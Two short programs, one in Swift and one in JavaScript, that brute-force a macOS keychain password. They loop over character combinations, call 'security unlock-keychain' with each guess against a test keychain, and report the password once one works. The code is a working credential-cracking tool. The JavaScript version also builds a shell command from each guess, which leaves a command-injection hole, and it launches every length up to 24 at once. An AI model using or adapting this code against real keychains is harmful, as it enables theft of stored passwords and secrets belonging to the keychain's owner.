File: bruter.swift
import Foundation

func bruteKeychain(password: String) -> Bool {
    let process = Process()
    process.executableURL = URL(fileURLWithPath: "/usr/bin/security")
    process.arguments = ["unlock-keychain", "-p", password, "/users/INSERT-USER-HERE/Library/Keychains/test.keychain"]

    let pipe = Pipe()
    process.standardError = pipe

    do {
        try process.run()
        process.waitUntilExit()

        let stderrData = pipe.fileHandleForReading.readDataToEndOfFile()
        return stderrData.isEmpty
    } catch {
        print("Error: \(error)")
        return false
    }
}

func brute(length: Int, startTime: TimeInterval) {
    let characters = "abcdefghijklm90!@".map { String($0) }

    let queue = DispatchQueue.global()
    let group = DispatchGroup()

    func search(prefix: String, depth: Int) {
        if depth == 0 {
            group.enter()
            queue.async {
                let result = bruteKeychain(password: prefix)
                if result {
                    print("Password is: \(prefix)")
                    print("Time taken: \(Date().timeIntervalSince1970 - startTime)")
                    exit(0)
                } else {
                    print("Password is not: \(prefix)")            
                }
                group.leave()
            }
        } else {
            for character in characters {
                search(prefix: prefix + character, depth: depth - 1)
            }
        }
    }

    search(prefix: "", depth: length)
    group.wait()
}

let startTime = Date().timeIntervalSince1970

for len in 0..<7 {
    brute(length: len, startTime: startTime)
    print(len)
}

File: Bruter.js
const { exec } = require('child_process');
const bruteForce = require('bruteforce');

function bruteKeychain(password) {
    return new Promise(resolve => {
        exec(`security unlock-keychain -p "${password}" ~/Library/Keychains/test.keychain`, (err, stdout, stderr) => {
            resolve(!stderr);
        });
    })
}

function brute(length, startTime) {

    (async() => {
        const check = bruteForce({
            len: length,
            chars: 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@'.split('')
        })
        
        for (let i = 0; i < check.length; i++) {
            let result = await bruteKeychain(check[i]);
            if (result) {
                console.log('Password is: ', check[i]);
                console.log('Time taken: ', Date.now() - startTime);
                throw new Error('Found password');
            }
        }
    })();
}

    let startTime = Date.now();
    for (let len = 0; len < 25; len++) {
        brute(len, startTime);
        console.log(len)
    }

